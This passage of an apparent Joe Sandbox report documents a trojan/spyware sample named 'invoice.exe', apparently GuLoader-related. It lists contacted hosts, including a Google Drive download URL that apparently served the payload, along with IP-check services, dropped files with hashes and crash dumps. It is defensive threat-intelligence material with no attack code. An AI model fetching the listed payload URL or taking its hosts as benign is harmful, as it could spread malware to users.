    | checkip.dyndns.org | unknown | unknown | true | | unknown |
    | doc-0k-a8-docs.googleusercontent.com | unknown | unknown | false | | high |

    | Name | Malicious | Antivirus Detection | Reputation |
    |---|---|---|---|
    | http://checkip.dyndns.org/ | true | 0%, Virustotal; Avira URL Cloud: safe | unknown |
    | https://doc-0k-a8-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/s4sbn26f0am6hqllsu7edmokcls88pe1/1679060025000/12467729248612761337/*/1v9qH2HQVytFc1xq78jdiMix-1m6jIF0S?e=download&uuid=a6a0f6a4-7f4f-44fa-b2c7-5636188002aa | false | | high |

    | Name | Source | Malicious | Antivirus Detection | Reputation |
    |---|---|---|---|---|
    | http://checkip.dyndns.org | CasPol.exe, 00000005.00000002.9014975295.0000000037959000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
    | http://www.avast.com0/ | invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown |
    | https://doc-0k-a8-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/s4sbn26f | CasPol.exe, 00000005.00000003.8679430245.0000000006EFD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8995413020.0000000006E97000.00000004.00000020.00020000.00000000.sdmp | false | | high |
    | http://nsis.sf.net/NSIS_Error | invoice.exe, invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp, invoice.exe, 00000001.00000000.7326800375.000000000040A000.00000008.00000001.01000000.00000003.sdmp | false | | high |
    | http://checkip.dyndns.com | CasPol.exe, 00000005.00000002.9014975295.0000000037959000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
    | http://nsis.sf.net/NSIS_ErrorError | invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp, invoice.exe, 00000001.00000000.7326800375.000000000040A000.00000008.00000001.01000000.00000003.sdmp | false | | high |
    | http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | CasPol.exe, 00000005.00000002.9014975295.00000000378A1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
    | https://drive.google.com/ | CasPol.exe, 00000005.00000002.8995413020.0000000006E3B000.00000004.00000020.00020000.00000000.sdmp | false | | high |

    | IP | Domain | Country | ASN | ASN Name | Malicious |
    |---|---|---|---|---|---|
    | 193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | true |
    | 142.250.184.206 | drive.google.com | United States | 15169 | GOOGLEUS | false |
    | 142.250.186.33 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false |

    Joe Sandbox Version: 37.0.0 Beryl
    Analysis ID: 828743
    Start date and time: 2023-03-17 14:30:04 +01:00
    Joe Sandbox Product: CloudBasic
    Overall analysis duration: 0h 11m 58s
    Hypervisor based Inspection enabled: false
    Report type: full
    Cookbook file name: default.jbs
    Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
    Number of analysed new started processes analysed: 10
    Number of new started drivers analysed: 0
    Number of existing processes analysed: 0
    Number of existing drivers analysed: 0
    Number of injected processes analysed: 0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode: default
    Analysis stop reason: Timeout
    Sample file name: invoice.exe
    Detection: MAL
    Classification: mal88.troj.spyw.evad.winEXE@5/19@3/3
    EGA Information:
    • Successful, ratio: 50%
    HDC Information:
    • Successful, ratio: 62.9% (good quality ratio 61.6%)
    • Quality average: 88.1%
    • Quality standard deviation: 21.8%
    HCA Information:
    • Successful, ratio: 90%
    • Number of executed functions: 63
    • Number of non-executed functions: 31
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
    • Stop behavior analysis, all processes terminated
    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 20.42.73.29
    • Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, wdcp.microsoft.com
    • Execution Graph export aborted for target CasPol.exe, PID 1520 because it is empty
    • Not all processes where analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Report size getting too big, too many NtReadVirtualMemory calls found.
    • Report size getting too big, too many NtSetInformationFile calls found.
                      No simulations
                      • 142.250.186.33
                      • 142.250.184.206
                      mkmn3YZFn3.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoaderBrowse
                      • 142.250.186.33
                      • 142.250.184.206
                      FACT64142.msiGet hashmaliciousUnknownBrowse
                      • 142.250.186.33
                      • 142.250.184.206
                      D0C93848394-Spodogenic.vbsGet hashmaliciousRemcosBrowse
                      • 142.250.186.33
                      • 142.250.184.206
                      SC_TR11670000.exeGet hashmaliciousGuLoader, LokibotBrowse
                      • 142.250.186.33
                      • 142.250.184.206
                      aRThcK3rSO.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoaderBrowse
                      • 142.250.186.33
                      • 142.250.184.206
                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                      • 142.250.186.33
                      • 142.250.184.206
                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                      • 142.250.186.33
                      • 142.250.184.206
                      setup.exeGet hashmaliciousAmadey, Djvu, RedLine, SmokeLoaderBrowse
                      • 142.250.186.33
                      • 142.250.184.206
                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                      • 142.250.186.33
                      • 142.250.184.206
                      setup.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                      • 142.250.186.33
                      • 142.250.184.206
                      Update.jsGet hashmaliciousUnknownBrowse
                      • 142.250.186.33
                      • 142.250.184.206
                      purchase_order.exeGet hashmaliciousBluStealer, ThunderFox Stealer, a310LoggerBrowse
                      • 142.250.186.33
                      • 142.250.184.206
                      file.exeGet hashmaliciousAmadey, Djvu, SmokeLoaderBrowse
                      • 142.250.186.33
                      • 142.250.184.206
                      1.bin.exeGet hashmaliciousBabuk, DjvuBrowse
                      • 142.250.186.33
                      • 142.250.184.206
                      ye5GHWJ8UG.exeGet hashmaliciousGrandcrab, GandcrabBrowse
                      • 142.250.186.33
                      • 142.250.184.206
                      setup.exeGet hashmaliciousVidarBrowse
                      • 142.250.186.33
                      • 142.250.184.206
                      Update.jsGet hashmaliciousUnknownBrowse
                      • 142.250.186.33
                      • 142.250.184.206
                      Match: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Antimodernly\trever\Hovedinteressers\lang-1059.dll
                      Associated Sample Name / URL, Detection, Threat Name:
                      • Justificante de pago.exe, Detection: malicious, Threat Name: GuLoader
                      • Justificante de pago.exe, Detection: malicious, Threat Name: GuLoader
                      • Ticari Hesap #U00d6zetiniz.exe, Detection: malicious, Threat Name: AgentTesla, GuLoader
                      • Ticari Hesap #U00d6zetiniz.exe, Detection: malicious, Threat Name: GuLoader
                      • Justificante de pago.exe, Detection: malicious, Threat Name: GuLoader
                      • Justificante de Transferencia.exe, Detection: malicious, Threat Name: AgentTesla, GuLoader
                      • BBVA-Confirming Facturas Pagadas al Vencimiento.exe, Detection: malicious, Threat Name: AgentTesla, GuLoader
                      • Justificante de pago.exe, Detection: malicious, Threat Name: GuLoader
                      • Justificante de Transferencia.exe, Detection: malicious, Threat Name: GuLoader
                      • BBVA-Confirming Facturas Pagadas al Vencimiento.exe, Detection: malicious, Threat Name: Unknown
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):1.2413258792200002
                                          Encrypted:false
                                          SSDEEP:192:lMbr9vYxYmBUWSaX+AMWVM+Du760fAIO8h:KFYHBUWSaOaq+Du760fAIO8h
                                          MD5:AA43B8BBA15A813BFCCD02E862007CD8
                                          SHA1:8250B873BAC21F5986212B2451B512E48B4349D5
                                          SHA-256:2D416E1A3C441D6B7DCF6EF0F287F15ED46DCEF848C32BEB31D02196D402DB63
                                          SHA-512:159EAE789D7948F7077A9761DCEB26AC5A66D646CA0E183AEF6B3DA6EA00C55BECAA2CFC90A5BBC04A875F15CA86A8348895E2A8F6D83D4EAF63D41DD09E77FB
                                          Malicious:false
                                          Reputation:low
                                          Preview:Version=1 EventType=CLR20r3 EventTime=133235372746766516 ReportType=2 Consent=1 UploadTime=133235372754264779 ReportStatus=524384 ReportIdentifier=04bcfbd1-2c77-4702-aba0-8ccec9d684fc IntegratorReportIdentifier=78a4132c-e2e4-4057-9f9f-46b2562867fe Wow64Host=34404 Wow64Guest=332 NsAppName=caspol.exe OriginalFilename=caspol.exe AppSessionGuid=000005f0-0001-0015-af24-aa8cdd58d901 TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!00008c68ca3f013c490161c0156ef359af03594ae5e2!C
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 14 streams, Fri Mar 17 14:34:35 2023, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):296706
                                          Entropy (8bit):3.5831200793212092
                                          Encrypted:false
                                          SSDEEP:3072:QA5LTg7X74RS+qaqyO0uE04uEqW6PCLFQq:QcTgoAHaqyb04z6S
                                          MD5:7EBCA7182F74A342B0C77C9FE8DDC072
                                          SHA1:1F7A577A9AC5731E0DD8130DDBB8B5B01D0F496E
                                          SHA-256:8D93AC888DBA63A724D6827FCEA592EE97BE5E19BFAE9131BD861813E6C644E5
                                          SHA-512:5DFF1396A6136908905076DFD12A267B8F69CC6D52F09107AE99EEF40EA84AFAD37AC33A39A543B064CAED628E585E76919C576AB535D5B22AB2CD3311E75CFB
                                          Malicious:false
                                          Reputation:low
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8434
                                          Entropy (8bit):3.7091201286754427
                                          Encrypted:false
                                          SSDEEP:192:R9l7lZNidI6IyHLoW6YAAo66ngmfZJCGprr89bw0sfBwm:R9lnNiC6IyroW6YAf6agmfXkwnfj
                                          MD5:A6EEA52F37433165774D6A66E6B6994F
                                          SHA1:97AEC2A821BA4337326EB3BDEE28195E298F6291
                                          SHA-256:5F4ECF6632344627BA5B494DEAB0E0E9F97E194E1F1FDC699D9985AADE578C43
                                          SHA-512:F068BFD03B06815A0677F92099A389CFCE810E184070BF8738E98F394268454DD077BA4A424488B9540E34750DE42AD5400C993401C3D862C9BDCEB290BE95B9
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19042</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.1165.amd64fre.vb_release.191206-1406</BuildString> <Revision>1165</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>1520</Pi
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4928
                                          Entropy (8bit):4.554053374413811
                                          Encrypted:false
                                          SSDEEP:48:cvIwwtl8zsnle702I7VFJ5WS2Cfjkss3rm8M4Jd0PFr+q8vr0uvkinkd:uILfs7GySPfqJCKXvkinkd
                                          MD5:5770CD5EAA63B08F65E7E38543698591
                                          SHA1:E440A41F9A3DAE38151312126A08FA17C818B0D2
                                          SHA-256:5D8A6CD4D2DE8A2B0B46B87FAEAB8B31E6622D0C5EF81970C9D65975B37CA94E
                                          SHA-512:5BFC69378548041A332B3E6ECDFA0A687C708BDDF0985D2694512F1967B56C86EC0BCE545567DDCF70CA98D0E113D023AEECE91538D05E5AABF64D8F5AC7453F
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222056236" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                                          Process:C:\Users\user\Desktop\invoice.exe
                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1245
                                          Entropy (8bit):5.462849750105637
                                          Encrypted:false
                                          SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
                                          MD5:5343C1A8B203C162A3BF3870D9F50FD4
                                          SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                                          SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                                          SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                                          Malicious:false
                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
                                          Process:C:\Users\user\Desktop\invoice.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):160264
                                          Entropy (8bit):4.358279117234243
                                          Encrypted:false
                                          SSDEEP:768:EVS3TP/nITMkSXnOLeecEKVdPGeGlo1ciX9NtfoxOpGHXGHmeVDj3bRQ9pY/ycVa:EVsPQBRodPDW4zMctML/
                                          MD5:B47C741673A92A16B48140FCBDA04030
                                          SHA1:AA7A003DA656320A274F276EE4BF8C27203D1B4C
                                          SHA-256:E6E775E7A5AC1BFA01B5A5CB9A7532171817408E67E346E33CA3CB091BDEA478
                                          SHA-512:464BFC63FD715E07C02ED78F9603A1C890F3848C0D46BB7B58D352B3FF1E76612E8D772903C9954159586735567DD493A023BCFADA5E15407725F7267567DC60
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Joe Sandbox View:
                                          • Filename: Justificante de pago.exe, Detection: malicious
                                          • Filename: Justificante de pago.exe, Detection: malicious
                                          • Filename: Ticari Hesap #U00d6zetiniz.exe, Detection: malicious
                                          • Filename: Ticari Hesap #U00d6zetiniz.exe, Detection: malicious
                                          • Filename: Justificante de pago.exe, Detection: malicious
                                          • Filename: Justificante de Transferencia.exe, Detection: malicious
                                          • Filename: BBVA-Confirming Facturas Pagadas al Vencimiento.exe, Detection: malicious
                                          • Filename: Justificante de pago.exe, Detection: malicious
                                          • Filename: Justificante de Transferencia.exe, Detection: malicious
                                          • Filename: BBVA-Confirming Facturas Pagadas al Vencimiento.exe, Detection: malicious
                                          Process:C:\Users\user\Desktop\invoice.exe
                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):323584
                                          Entropy (8bit):6.212800759462987
                                          Encrypted:false
                                          SSDEEP:3072:KW+Rs18sEZQEwgD+odVKFKLuFv1kJV0YVJL/vFU/lmJ03Hk7OJ3/b7FG66sN4IqF:j7SdPKZ1kJLLH+lmJgHeOVb7o663L
                                          MD5:86B8B1F5C1189D68B07666784BE882FE
                                          SHA1:B023E9442CFC9C9652E1C8990F06DEF08BDC5B01
                                          SHA-256:0DD8C627F3DDBDB61B1910540C465C0D62C9F8D84C7CBB6C80782DB02D535AF0
                                          SHA-512:E471BEBDD441756CD840420C862CD84EF18A03144DDCAA20D783399D0736BD012D3984E38BDDB9DF16837B205D0A6ECA4C6FEE1D41553B5002A4B1E1B753E139
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 2%
                                          Process:C:\Users\user\Desktop\invoice.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):10376
                                          Entropy (8bit):7.080841609849737
                                          Encrypted:false
                                          SSDEEP:192:pL/2EJC+EhGRmwBYyKaWFWQFV5NB0884LfqnajnWc:11PCFRVJlLWc
                                          MD5:DBE99D951395F37E5C3F4164D8A22245
                                          SHA1:238EF179549F6AEB2E3C6F4188365814A965312B
                                          SHA-256:671CB26C75AC0256B07835AE00E7018AF6126FAE7400BF21E57707E0CC9164B5
                                          SHA-512:3A931015C1038965028AD70E439F75BA210B1113BBCD8A7C5063DA376DBB577F250BE6141B93F1CB100084A930DAD4B2205864F19F3A5E3911CD6CC0B6D0D0D8
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\invoice.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):353768
                                          Entropy (8bit):6.836018886719178
                                          Encrypted:false
                                          SSDEEP:6144:EpcTapyHuUcl0PUpFawtMR6gP4aHrmtcWR3uA9:MIaQ+l0PoRtW6aHrmtcWRt9
                                          MD5:B75A8E0DDEEB4330C1DBA37105244B0F
                                          SHA1:E5302CA8517AC2826B5D56E3395D41C34B5B3DF7
                                          SHA-256:CC142B9D8B5223E2720C6440CB7A124C0A80D2FB04ECF59AD7331DFD6E3CB51F
                                          SHA-512:120F91A144B5B6CC9E33B232AE4466AF2E6C5F702F4C04E9A03DD4F239DE752770E4DE2C6BE2CAF3BEE9775C8887EAB9E08A896D7F2EBA1AD8CF928555CC99A3
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Process:C:\Users\user\Desktop\invoice.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):116720
                                          Entropy (8bit):5.889271571414613
                                          Encrypted:false
                                          SSDEEP:3072:g3nqpX2I6OhctR+lCTD01Lcy4J93TnCx86:L2W1oy4J93TCT
                                          MD5:DBF787BD6E5CE77FB34FF281A144EB96
                                          SHA1:50B7799ECCA566BE35429828245D44CB04AD8885
                                          SHA-256:CCBACEEA04837229C95C08274C747ABE069279AFB990DDD89EC743C42ADC0AD9
                                          SHA-512:07949EC3882D9CB6E2341CE60C6E911F24463B01F484C037E65A2A8F3495543A096B632E01F8480D03FF388D1E811ECF760155F97F1D5329785C506603BB18A7
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Process:C:\Users\user\Desktop\invoice.exe
                                          File Type:ASCII text, with very long lines (52812), with no line terminators
                                          Category:dropped
                                          Size (bytes):52812
                                          Entropy (8bit):2.691443133069214
                                          Encrypted:false
                                          SSDEEP:768:w3MHvSSEEEE422O9Py2Ve76uBu+O3+xpnY/A8o9kxErpEEEbYRx+KmGSBAM07byk:bvS53XH/Y/A8opMr07bnr
                                          MD5:4C6FAD70762561B0D38AA152C52796A8
                                          SHA1:9FAFD1E9CF41E5482AC7960F7F0C20AB5B703D30
                                          SHA-256:C7CC1E08C3B0850EF02E7F4371D71918B55686581FDE5D124149884EE56C8F4F
                                          SHA-512:721DC72FF2153615343BCEC4B408337E8BD5012C234237F2005C43C48D1179DEDC1606014DE6659F5A22BC9116C2348C1AD5B05BF128D60572EEAE9346E06EE0
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\invoice.exe
                                          File Type:OpenType font data
                                          Category:dropped
                                          Size (bytes):127080
                                          Entropy (8bit):7.036042013030407
                                          Encrypted:false
                                          SSDEEP:3072:Tz0LOC7z/0cS/Uz0+Gp+dtsVaHGg0IADoQg4RAxL2+p:s7z/0jUz0+GsdBHGg9cg4mvp
                                          MD5:9ECC8DF598E9EDDE1072942D344CC0CF
                                          SHA1:9FF240AB48EB7E97237E25D8C6F8CD738BA97CAA
                                          SHA-256:D945E1C81A59A434E36EEDEF21E64B61CC6901A9E43936AF79C20BDBF57592B1
                                          SHA-512:09978B7AF39B541C13F5E628BAF789E9FD1635258C74379351612451022D53B38B9F78DA7A74C19BA0FFB7B0C93B63C69EFCFC36285EFBCAF3678ADE7D423AD0
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\invoice.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):9204
                                          Entropy (8bit):5.371514089173945
                                          Encrypted:false
                                          SSDEEP:192:iRJ98lWxEb5BvGIrd+mc1OTno+SXhbSIm1JjSvcQpK/w:ijK0GeIrQmEOTno+SXox1JjmpKo
                                          MD5:641B90F9AEDFC68486D0D20B40F7ECA6
                                          SHA1:0A683DD844534905336784FADD80498AFE26F6FA
                                          SHA-256:87A4B9369FD51D76C9032C0E65C3C6221659E086798829072785BE589E55B839
                                          SHA-512:567CB9F6C31D196A171E5A9C2726A39A9B3D351AC92D4ACF8624213A68C9033ACC31AFAAAD82AA9F5359F32D3A0CA40522E151B8370D553A41ABEB6A6E097078
                                          Malicious:false
                                          Preview:.;!@Lang2@!UTF-8!..; 4.30 : Milan Hrub...; 4.33 : Michal Molhanec..; 9.07 : Ji.. Mal.k..; 15.00 : Kry.tof .ern...;..;..;..;..;..;..;..0..7-Zip..Czech...e.tina..401..OK..Storno........&Ano..&Ne..Zav..&t..N.pov.da....Po&kra.ovat..440..Ano na &v.echno..N&e na v.echno..Zastavit..Spustit znovu..&Pozad...P&op.ed...Po&zastavit..Pozastaveno..Jste si jist., .e to chcete stornovat?..500..&Soubor...pr&avy..&Zobrazen...&Obl.ben...&N.stroje..N.po&v.da..540..&Otev..t..Otev..t u&vnit...Otev..t &mimo..&Zobrazit..&Upravit..&P.ejmenovat..Kop.rovat &do.....P.&esunout do.....Vymaza&t..&Rozd.lit soubor.....&Slou.it soubory.....Vlast&nosti..Pozn.mk&a..Vypo..tat kontroln. sou.et..Porovnat soubory..Vytvo.it slo.ku..Vytvo.it soubor..&Konec..Odk.zat..&Alternate Streams..600..Vybrat &v.e..Zru.it v.b.r v.e..&Invertovat v.b.r..Vybrat.....Zru.it v.b.r.....Vybrat podle typu..Zru.it v.b.r podle typu..700..&Velk. ikony..&Mal. ikony..&Seznam..&Podrobn
                                          Process:C:\Users\user\Desktop\invoice.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):218305
                                          Entropy (8bit):7.337101777894853
                                          Encrypted:false
                                          SSDEEP:3072:PdqWTzg/gzZ9xRpRmib28JUBTE+vAsGolsJAsJ7Z/aKespGgyfZrl:HOaZ1nv9J2I+veZiKe2i
                                          MD5:DF0C864AD6FE636F3AD391B04A408AC7
                                          SHA1:B0072D5406BA66EDD9F6A1A443D56378BDA688C5
                                          SHA-256:A802EB02B9345615A947C6B8B57441D7DEBD4300FFEAFC16623CE18F68CABBF2
                                          SHA-512:2AA97CC2724CA1309B3594F552BAF227CCB7B6F73B29E612A9779D987E9FBE0E41F7CE765083AE16CD3CEC84B826A401279D69200D1AE3A0722B4E3CC731079C
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\invoice.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):5632
                                          Entropy (8bit):4.76010720109437
                                          Encrypted:false
                                          SSDEEP:96:HqNXqwK188CgAtXvZBkjDf0yf9ysrtWp2wol:HAqrg1XvZB6kYtWp2
                                          MD5:88C3BA1802AEF228541820767453E058
                                          SHA1:4F3AEFB9E4EC27CB49973CB19BD968E54A2BA676
                                          SHA-256:2722555EC1F72523774B64D25FD4C2B460000BFE82140876D6100DC4FB1F62B1
                                          SHA-512:718790339E13B53553AFDE6968AE10CDA7B47CBDBFC82599116C8B5B1E8FBBA259F0CE6781908BE027360132A0ABE057DF2FFA7072212ACDA96BFF535E241582
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+.Y.o.7Eo.7Eo.7Eo.6EF.7E..jEf.7E;..Em.7E..3En.7ERicho.7E........PE..L.....uY...........!................`........ ...............................P......................................P$..E.... ..d............................@..$.................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\invoice.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):11264
                                          Entropy (8bit):5.767999234165119
                                          Encrypted:false
                                          SSDEEP:192:cPtkumJX7zBE2kGwfy9S9VkPsFQ1MZ1c:N7O2k5q9wA1MZa
                                          MD5:C9473CB90D79A374B2BA6040CA16E45C
                                          SHA1:AB95B54F12796DCE57210D65F05124A6ED81234A
                                          SHA-256:B80A5CBA69D1853ED5979B0CA0352437BF368A5CFB86CB4528EDADD410E11352
                                          SHA-512:EAFE7D5894622BC21F663BCA4DD594392EE0F5B29270B6B56B0187093D6A3A103545464FF6398AD32D2CF15DAB79B1F133218BA9BA337DDC01330B5ADA804D7B
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L.....uY...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..^....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):2097152
                                          Entropy (8bit):4.523815600656336
                                          Encrypted:false
                                          SSDEEP:12288:kDvK0ehODuTywB84iTd+vXlnebS23+5PfWhsYSDzFJFGl56zwlMhagmcnYJx:kATywB84iTd+vXlneGKHlMhagmcnYJx
                                          MD5:6B3E54A24A9E83963E044BE36E344CD6
                                          SHA1:FE8383F68D875A4C9E711E7878D7385C1612CCCA
                                          SHA-256:D3FF0F24C8D20A5005CC564DEB0B197A5FBF1506F3F1388D50292DD118698312
                                          SHA-512:BD8821C4DE2619E9450DE73A4FAA53B13D6102CB1686DFABBB72D01B12AE96FC8918D01FD366ACC3EC139DD22DAFBDFDE98D418677656469776B9C992C4D8904
                                          Malicious:false
                                          Preview:regf........5.#.^................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm..c..X...............................................................................................................................................................................................................................................................................................................................................l..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):499712
                                          Entropy (8bit):4.5534365820054905
                                          Encrypted:false
                                          SSDEEP:3072:HAQEODdececetnZJCy5i1T7Em0CXrnS+p2oJHrYKzOixxRvF5dlEVyi9RReloD3I:0OJJxa5ii+4yLYKzX1F/ljiteloN5
                                          MD5:51B02C650B9F903CC6EEACB3A10D21A5
                                          SHA1:4EA07D7465F2429B16A13D2058F8A4B25CC65AE4
                                          SHA-256:30B4E3705D8FAC7230A89C328F433F7EEC2FA552181EE91AB39F4B13A7ED70ED
                                          SHA-512:7624DD241AC2E1448014E5B603C9FDD255180E437E1A34520D8115C3B56052D24DC7FD98C4ED929D6722F71CCF1F2FC978C3344F7FABEADEA4F490B78D7B137F
                                          Malicious:false
